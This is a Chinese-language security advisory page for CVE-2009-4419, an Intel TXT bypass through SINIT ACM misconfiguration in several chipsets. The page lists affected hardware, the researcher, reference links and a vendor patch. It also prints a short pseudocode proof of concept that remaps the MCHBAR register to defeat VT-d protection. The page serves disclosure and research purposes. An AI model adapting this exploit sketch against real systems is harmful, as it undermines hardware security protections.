发布日期:2009-12-21
更新日期:2009-12-25受影响系统:
Intel Q35
Intel GM45
Intel PM45 Express
Intel Q45
Intel Q43 Express
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 37430
CVE ID: CVE-2009-4419英特尔可信执行技术是英特尔酷睿2双核处理器E8400中的一项硬件延展技术,旨在保护虚拟化计算环境中的数据免遭软件攻击、病毒入侵及其它类型威胁。多个Intel芯片组的SINIT认证代码模块(ACM)中存在错误配置,允许本地用户将MCHBAR寄存器修改为指向受控的区域,在加载MLE期间SENTER指令无法正确地应用VT-d保护,以绕过可信执行技术的保护机制。<*来源:Alexander Tereshkin
链接:http://secunia.com/advisories/37900/
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00021&languageid=en-fr
http://invisiblethingslab.com/resources/misc09/Another%20TXT%20Attack.pdf
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#define ETH_MEM 0xfef00000
#define FAKE_MCHBAR (ETH_MEM+0x10000)
#define NEW_MCHBAR ((1ULL<<32) +
FAKE_MCHBAR)
// map some memory above 0xfec00000...
pci_write_long (ETH_DEV, MBARA_REG,
ETH_MEM)
// copy original MCHBAR region there...
MCHBAR = pci_read_long (MCH_DEV,
MCHBAR_REG);
memcpy (FAKE_MCHBAR, MCHBAR&~1, 0x4000);
// do the trick!
DMAR = get_acpi_dmar_base();
DMAR.DRHD[3].BAR = DMAR.DRHD[0].BAR
*(FAKE_MCHBAR + 0xdc0) = DMAR.DRHD[3].BAR
// update MCHBAR...
pci_write_longlong (MCH_DEV, MCHBAR_REG,
NEW_MCHBAR | 0x1)建议:
--------------------------------------------------------------------------------
厂商补丁:Intel
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://sourceforge.net/projects/tboot/files/本安全漏洞由Adobe Acrobat再曝0day漏洞 或导致计算机被远程控制phpGroupWare多个输入验证漏洞相关资讯 漏洞
- 快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
- 要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
- ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
| - 软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
- PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
- Open Handset Alliance Android (03/01/2012 06:59:34)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|